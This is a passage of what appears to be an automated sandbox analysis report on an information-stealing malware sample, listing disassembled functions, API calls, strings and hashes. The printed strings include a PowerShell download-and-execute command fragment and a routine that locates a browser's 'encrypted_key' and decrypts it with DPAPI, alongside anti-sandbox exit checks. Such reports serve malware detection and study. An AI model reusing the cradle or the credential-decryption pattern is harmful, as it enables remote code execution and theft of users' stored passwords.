                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 2311089104-0
                                                                                  • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                                                  • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                                                  • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                                                  • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                                                  Function 00B09C27 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B09C53
                                                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09C78
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B09C98
                                                                                  • ReadFile.KERNEL32(000000FF,?,00000000,00B016F6,00000000), ref: 00B09CC1
                                                                                  • LocalFree.KERNEL32(00B016F6), ref: 00B09CF7
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00B09D01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 2311089104-0
                                                                                  • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                                                  • Instruction ID: 88ca19be60a0b345f5e7ee5a3a5af24904ee522ab5665d3eeb20ea8a98e74e6d
                                                                                  • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                                                  • Instruction Fuzzy Hash: 1631E974A40209EFEB24CF94D895BEE7BF5EF49700F108198E915A72D0C774AA41CFA1
                                                                                  Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0041C9EA
                                                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                                                  • __amsg_exit.LIBCMT ref: 0041CA0A
                                                                                  • __lock.LIBCMT ref: 0041CA1A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                                                  • free.MSVCRT ref: 0041CA4A
                                                                                  • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                  • String ID:
                                                                                  • API String ID: 634100517-0
                                                                                  • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                                  • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                                                  • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                                  • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                                                  Function 00B1CC45 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 00B1CC51
                                                                                    • Part of subcall function 00B1C206: __getptd_noexit.LIBCMT ref: 00B1C209
                                                                                    • Part of subcall function 00B1C206: __amsg_exit.LIBCMT ref: 00B1C216
                                                                                  • __amsg_exit.LIBCMT ref: 00B1CC71
                                                                                  • __lock.LIBCMT ref: 00B1CC81
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00B1CC9E
                                                                                  • free.MSVCRT ref: 00B1CCB1
                                                                                  • InterlockedIncrement.KERNEL32(0042B980), ref: 00B1CCC9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                  • String ID:
                                                                                  • API String ID: 634100517-0
                                                                                  • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                                                  • Instruction ID: 365b9756a65260200758e915f8e87b57bcd0806a3a8768ce2b5b23da83359726
                                                                                  • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                                                  • Instruction Fuzzy Hash: 28010031A81B25ABC720AB649445BDC7FE0FF00750FD40196EC1867290C7346CC1DBD9
                                                                                  Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • strlen.MSVCRT ref: 00416F1F
                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                                                    • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                  • String ID: @
                                                                                  • API String ID: 2950663791-2766056989
                                                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                  • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                  • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                                                  Function 00B17167 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • strlen.MSVCRT ref: 00B17186
                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00B17401,00000000,00420BA8,00000000,00000000), ref: 00B171B4
                                                                                    • Part of subcall function 00B16E37: strlen.MSVCRT ref: 00B16E48
                                                                                    • Part of subcall function 00B16E37: strlen.MSVCRT ref: 00B16E6C
                                                                                  • VirtualQueryEx.KERNEL32(00B17574,00000000,?,0000001C), ref: 00B171F9
                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B17401), ref: 00B1731A
                                                                                    • Part of subcall function 00B17047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00B1705F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                  • String ID: @
                                                                                  • API String ID: 2950663791-2766056989
                                                                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                  • Instruction ID: e69d2bd20210fc7459ffbc51240045780b8e7679139132b7c74159c02a6d8f39
                                                                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                  • Instruction Fuzzy Hash: E751E5B1A04109EBDB08CF98E981AEFB7F5FF88300F148559F915A7240D734AA52DBA5
                                                                                  Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: *n@$*n@
                                                                                  • API String ID: 1029625771-193229609
                                                                                  • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                                                  • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                                                  • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                                                  • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                                                  Function 00B149E7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 00B14A42
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B14A68
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B14A87
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B14A9B
                                                                                  • lstrcat.KERNEL32(?,0064A284), ref: 00B14AAE
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B14AC2
                                                                                  • lstrcat.KERNEL32(?,0064A2C8), ref: 00B14AD6
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B18FF7: GetFileAttributesA.KERNEL32(00000000,?,00B01DBB,?,?,0042565C,?,?,00420E1F), ref: 00B19006
                                                                                    • Part of subcall function 00B147D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B147E7
                                                                                    • Part of subcall function 00B147D7: RtlAllocateHeap.NTDLL(00000000), ref: 00B147EE
                                                                                    • Part of subcall function 00B147D7: wsprintfA.USER32 ref: 00B1480D
                                                                                    • Part of subcall function 00B147D7: FindFirstFileA.KERNEL32(?,?), ref: 00B14824
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2540262943-0
                                                                                  • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                                                  • Instruction ID: 947533a9a82f1d7e611b3499f254a425c3d9856399c4106fe03d98f4ba829cfe
                                                                                  • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                                                  • Instruction Fuzzy Hash: E53162F69402086BDB14FBF0DC85EEA73B9BB58700F8045C9B24596081EEB597C9CB95
                                                                                  Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                                                  Strings
                                                                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                                                  • ')", xrefs: 00412CB3
                                                                                  • <, xrefs: 00412D39
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  • API String ID: 3031569214-898575020
                                                                                  • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                                                  • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                                                  • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                                                  • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                                                  Function 00B01487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B014A5
                                                                                  • __aulldiv.LIBCMT ref: 00B014BF
                                                                                  • __aulldiv.LIBCMT ref: 00B014CD
                                                                                  • ExitProcess.KERNEL32 ref: 00B014FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 3404098578-2766056989
                                                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                  • Instruction ID: 836e8706b11745c0af51f907765470974c4aff07afab487f6a6db00e5638751b
                                                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                  • Instruction Fuzzy Hash: 9801FBB0940308FAEF14DBD4CC89B9DBAB8EB50705F608888F6057B2D0D6B496858B55
                                                                                  Function 00B0A077 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memcmp.MSVCRT(?,00421264,00000003), ref: 00B0A094
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B10CC7: memset.MSVCRT ref: 00B10E83
                                                                                    • Part of subcall function 00B10CC7: lstrcat.KERNEL32(?,00000000), ref: 00B10E9C
                                                                                    • Part of subcall function 00B10CC7: lstrcat.KERNEL32(?,00420D7C), ref: 00B10EAE
                                                                                    • Part of subcall function 00B10CC7: lstrcat.KERNEL32(?,00000000), ref: 00B10EC4
                                                                                    • Part of subcall function 00B10CC7: lstrcat.KERNEL32(?,00420D80), ref: 00B10ED6
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • memcmp.MSVCRT(?,00421114,00000003), ref: 00B0A116
                                                                                  • memset.MSVCRT ref: 00B0A14F
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B0A1A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                                                  • String ID: @
                                                                                  • API String ID: 1977917189-2766056989
                                                                                  • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                                                  • Instruction ID: 372f73e869a291c4f18a706850715944938958475b4a4cf34c00f4202743b72a
                                                                                  • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                                                  • Instruction Fuzzy Hash: 20615B70600248EBCB18EFA4CD96FED7BB1AF44300F408158F90AAB591EB746A45CB42
                                                                                  Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • strtok_s.MSVCRT ref: 00410DB8
                                                                                  • strtok_s.MSVCRT ref: 00410EFD
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strtok_s$lstrcpylstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 348468850-0
                                                                                  • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                                                  • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                                                  • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                                                  • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                                                  Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                                                    • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                                                    • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                                                    • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                                                    • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                  • String ID: $"encrypted_key":"$DPAPI
                                                                                  • API String ID: 3731072634-738592651
                                                                                  • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                                                  • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                                                  • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                                                  • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                                                  Function 00B1CDA0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CodeInfoPageValidmemset
                                                                                  • String ID:
                                                                                  • API String ID: 703783727-0
                                                                                  • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                                                  • Instruction ID: 312cd82d977caac84190f7cfbddd4ce8e65e609e36fca0e1bc2849f12e60d507
                                                                                  • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                                                  • Instruction Fuzzy Hash: A531F831A842959ED7268F75C8953F9BFE1DF06310B9841FAD881CF192C328D986D761
                                                                                  Function 00B16B87 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?), ref: 00B16BD3
                                                                                  • sscanf.NTDLL ref: 00B16C00
                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B16C19
                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B16C27
                                                                                  • ExitProcess.KERNEL32 ref: 00B16C41
                                                                                  Memory Dump Source
